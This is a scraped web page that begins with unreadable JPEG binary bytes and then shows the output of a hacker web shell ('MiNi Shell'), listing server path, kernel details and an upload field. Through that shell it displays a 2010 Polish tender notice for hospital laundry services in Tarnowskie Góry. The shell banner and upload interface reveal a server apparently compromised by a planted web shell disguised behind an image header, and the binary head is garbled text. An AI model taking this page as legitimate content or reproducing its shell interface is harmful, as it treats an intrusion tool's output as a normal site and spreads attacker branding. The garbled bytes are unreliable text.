JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100723/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100723/222858-N-2010.html

<p class="kh_header"><b>Tarnowskie Góry: USŁUGA PRANIA</b><br>
<b>Numer ogłoszenia: 222858 - 2010; data zamieszczenia: 23.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> SP ZOZ "Repty" Górnośląskie Centrum Rehabilitacji im. gen. Jerzego Ziętka , ul. Śniadeckiego 1, 42-604 Tarnowskie Góry, woj. śląskie, tel. 032 3901206, faks 032 3901353.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.repty.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGA PRANIA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Pranie bielizny szpitalnej w ilości średnio - miesięcznej 5800 kg ( + - 20%) w tym :
-	bielizny fasonowej ( odzież ochronna i robocza )
-	pościeli szpitalnej,
-	bielizny osobistej, dziennej i nocnej pacjenta,
-	koców, materacy, firan, zasłon, ręczników, obrusów , ścierek, poduszek, kołder, mopów, żaluzji, wycieraczek, czyszczenie rolet okiennych.
2. Dodatkowo w zakres usług wchodzi : dezynfekcja, prasowanie, maglowanie,  usztywnianie, sortowanie, drobne reperacje.
3. Odbiór i dostawa bielizny i pościeli szpitalnej  własnym transportem 	Wykonawcy przystosowanym do realizacji  tej usługi zgodnie z wymogami   	stawianymi przez Państwową Stację Sanitarno - Epidemiologiczną .
4. Rozliczanie się z odebranej do prania bielizny i pościeli.
5. W razie potrzeby Wykonawca zapewni pranie chemiczne we własnym zakresie.
6. Odbiór brudnej i dostawa czystej bielizny zgodnie z  zasadami higienicznymi i epidemiologicznymi od poniedziałku do piątku według  harmonogramu pracy magazynu bielizny ( w razie potrzeby w dni wolne od pracy).
7. Termin wykonania usługi pralniczej w stosunku do bielizny szpitalnej, fasonowej oraz osobistej pacjenta zostanie zrealizowany w ciągu 48 godz., natomiast: koce, materace, firany, zasłony, ręczniki, obrusy, ścierki, poduszki, kołdry, mopy,  wycieraczki do 72 godz. od odebrania od Zleceniodawcy.
8. Termin na wykonanie reklamacji w przypadku stwierdzonych usterek dotyczących jakości usług pralniczych wynosi 3 dni, a koszty ponownego wykonania usługi ponosi Zleceniobiorca. W przypadku stwierdzenia zasadności reklamacji dotyczącej braków ilościowych, Zleceniobiorca zobowiązuje się do niezwłocznego uzupełnienia braków w tym samym asortymencie, kolorze i gatunku.
9. Pranie, dezynfekcja, maglowanie , właściwe usztywnianie bielizny, prasowanie oraz drobne naprawy, które będą polegały na : przyszywaniu wymianie guzików, troczków ( w przypadku ich zniszczenia ), przyszywaniu rozdartych kieszeni, cerowaniu dziur, przyszywaniu zamków błyskawicznych, przyszywaniu 	rozdartych boków,
10. Sortowanie, pakowanie wg asortymentu.
11. Zapewnienie opakowania czystej bielizny oraz pozostałego asortymentu w sposób zapewniający ochronę przed zanieczyszczeniem od momentu zakończenia cyklu technologicznego prania do momentu dostarczenia do Centralnego magazynu bielizny (kolorystyka opakowań zgodna z kolorystyką przyjętą w szpitalu- białe worki nieprzeźroczyste, foliowe). Materace należy szczelnie opakować workiem foliowym. 
12. Bielizna skażona będzie prana w specjalnie do tego celu przeznaczonej pralnicy.
13.Bielizna skażona będzie dostarczona do Wykonawcy bez wytrzepywania, przepierania, dezynfekcji w zamkniętym opisanym worku koloru czerwonego pakowana dwu - warstwowo tj: folia, tekstylia. 
14. Pralnia zapewni automatyczne dozowanie środków piorących i dezynfekcyjnych,  które nie będą odbarwiały tkanin.
15. Pralnia musi posiadać komory dezynfekcyjne do materacy.
16. Wykonawca na czas trwania umowy zapewni Zamawiającemu odpowiednią  ilość worków tekstylnych do transportu bielizny oraz pozostałego asortymentu z uwzględnieniem funkcjonującej w szpitalu kolorystyki. Wytrzymałość worka min.  500-krotna, tkanina dowolna dostosowana do gromadzenia i transportu brudnej bielizny, możliwość transportu bielizny mokrej/wilgotnej, posiadający możliwość bezpiecznego zamknięcia. 
Parametry worka foliowego na materac : szerokość 45 cm, długość 210 cm. 
Ilość worków na materac : biały - 50 szt. 
Parametry stelaży na worki do bielizny szpitalnej : szerokość 45 cm, długość 39 cm, średnica otworu 52 cm, wysokość 79 cm. 
Ilość worków do bieżącego użytku - 200 szt.
Należy dołączyć przykładowy worek do oferty (zostanie zwrócony po zakończeniu przetargu).  
Worki tekstylne będą przeznaczone tylko i wyłącznie dla GCR Repty.
17. Zapewnienie wieszaków na ubrania i siatek do prania.
18.Bielizna nie nadająca się do dalszego użytkowania bądź naprawy winna być zapakowana w oddzielnym worku z opisem kasacja.
19. Transport bielizny czystej do Zamawiającego i brudnej do pralni ma odbywać się na wózkach jezdnych dostarczonych na czas trwania umowy przez  Wykonawcę w 	ilości wynikającej z wielkości dostaw.
20. Osoba odbierająca i dostarczająca bieliznę obowiązana jest posiadać prawidłowy strój - fartuch ochronny i rękawice ochronnej.
21. Wykonawca dostarczy kopię protokółów kontroli sanitarnej, wyniki wymazów mikrobiologicznych potwierdzających skuteczność działania komory dezynfekcyjnej oraz zużycie preparatów piorących i dezynfekcyjnych raz na pół roku w trakcie trwania umowy.
UWAGA! Zamawiający zastrzega sobie prawo do weryfikacji informacji podanych w ofercie poprzez dokonanie wizji lokalnej pralni Wykonawców, którzy złożą ofertę.

Nazwy i kody dotyczące przedmiotu zamówienia określone we Wspólnym Słowniku Zamówień (CPV): 98311000-6, 98312000-3, 98310000-9, 98315000-4.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust 1 pkt 6  Pzp.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 98.31.10.00-6, 98.31.20.00-3, 98.31.00.00-9, 98.31.50.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że posiada pozytywną opinię właściwego Państwowego Powiatowego Inspektora Sanitarnego zgodną z Rozporządzeniem Ministra Zdrowia z dnia 10 listopada 2006r w sprawie wymagań, jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej,   stwierdzającą spełnienie wymagań sanitarnych do świadczenia usług pralniczych dla szpitali, spełnianie wymogów z zakresu prania bielizny szpitalnej, stanu sanitarno - technicznego oraz opinię o dopuszczalności środków transportu do przewożenia bielizny szpitalnej. Aby potwierdzić skuteczność działania komory dezynfekcyjnej do materacy - do oferty należy dołączyć kopię badań mikrobiologicznych przeprowadzonych w 2010r. dokumentujących sprawność działania i skuteczność dezynfekcji komory, wykonanych w stacji Sanitarno - Epidemiologicznej.
Ocena spełnienia warunków, o których mowa w art. 22 ust 1 ustawy Pzp dokonana zostanie  na podstawie informacji zawartych w  dokumentach załączonych do oferty metodą spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej dwie usługi prania w obiekcie szpitalnym o charakterze i złożoności porównywalnej z zakresem zamówienia każda o wartości brutto nie mniejszej niż 370.000 zł
Ocena spełnienia warunków, o których mowa w art. 22 ust 1 ustawy Pzp dokonana zostanie  na podstawie informacji zawartych w  dokumentach załączonych do oferty metodą spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że posiada opłacone ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności zgodnej z przedmiotem niniejszego zamówienia na wartość co najmniej 500.000 zł
Ocena spełnienia warunków, o których mowa w art. 22 ust 1 ustawy Pzp dokonana zostanie  na podstawie informacji zawartych w  dokumentach załączonych do oferty metodą spełnia/ nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a). wykaz środków piorących  i dezynfekcyjnych, które będą wykorzystane do wykonania usługi (karty charakterystyki należy dostarczyć na każde żądanie Zamawiającego). Środki te powinny być zarejestrowane w Urzędzie Rejestracji Produktów Leczniczych Wyrobów i Produktów Biobójczych oraz  muszą być przeznaczone do prania bielizny szpitalnej,
    b). schemat cyklu technologicznego, 
    c). oświadczenie, że Wykonawca  posiada procedury  dotyczące technologii dezynfekcji i prania bielizny szpitalnej, transportu, mycia i dezynfekcji całego wyposażenia oraz powierzchni pralni, higieny pracowników (dezynfekcja rąk, stosowanie środków higieny osobistej, zmiany odzieży, podziału pracowników na strefy),
    d). oświadczenie potwierdzające posiadanie  automatycznego systemu dozowania środków piorących i dezynfekcyjnych (do oświadczenia  należy dołączyć opis tego systemu wraz z podaniem jego typu ).
    e). pozytywną opinię właściwego Państwowego Powiatowego Inspektora Sanitarnego zgodną z Rozporządzeniem Ministra Zdrowia z dnia 10 listopada 2006r w sprawie wymagań, jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej,   stwierdzającą spełnienie wymagań sanitarnych do świadczenia usług pralniczych dla szpitali, spełnianie wymogów z zakresu prania bielizny szpitalnej, stanu sanitarno - technicznego oraz opinię o dopuszczalności środków transportu do przewożenia bielizny szpitalnej. Aby potwierdzić skuteczność działania komory dezynfekcyjnej do materacy - do oferty należy dołączyć kopię badań mikrobiologicznych przeprowadzonych w 2010r. dokumentujących sprawność działania i skuteczność dezynfekcji komory, wykonanych w stacji Sanitarno - Epidemiologicznej,
 f).   oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia dotyczące higieny oraz technologii prania;
 g). przykładowy worek zgodnie z pkt. III. ppkt.16 SIWZ</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a). wykaz części zamówienia, których wykonanie zostanie powierzone podwykonawcom (załącznik nr 6),
b). pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia w przypadku, gdy Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków,
c). pełnomocnictwo do podpisywania dokumentów i składania wyjaśnień, jeżeli ofertę podpisuje pełnomocnik Wykonawcy, w formie oryginału lub kserokopii poświadczonej notarialnie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień niniejszej umowy w stosunku do treści oferty, w przypadku wystąpienia następujących przesłanek:
a) zaistniały okoliczności, których nie można było przewidzieć w chwili podpisania umowy a zmiana ceny jest korzystna dla Zamawiającego,
b)  nastąpi zmiana wysokości stawki podatku od towarów i usług ( VAT) na usługę będącą przedmiotem niniejszej umowy, powodująca że  niezmienność ceny groziłaby Wykonawcy rażącą stratą.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.repty.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SP ZOZ REPTY Górnośląskie Centrum Rehabilitacji im. Gen. Jerzego Ziętka
ul. Śniadeckiego 1     42-604 Tarnowskie Góry      
Sekcja zamówień publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.08.2010 godzina 11:00, miejsce: SP ZOZ REPTY Górnośląskie Centrum Rehabilitacji im. Gen. Jerzego Ziętka
ul. Śniadeckiego 1     42-604 Tarnowskie Góry      
Sekcja zamówień publicznych.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com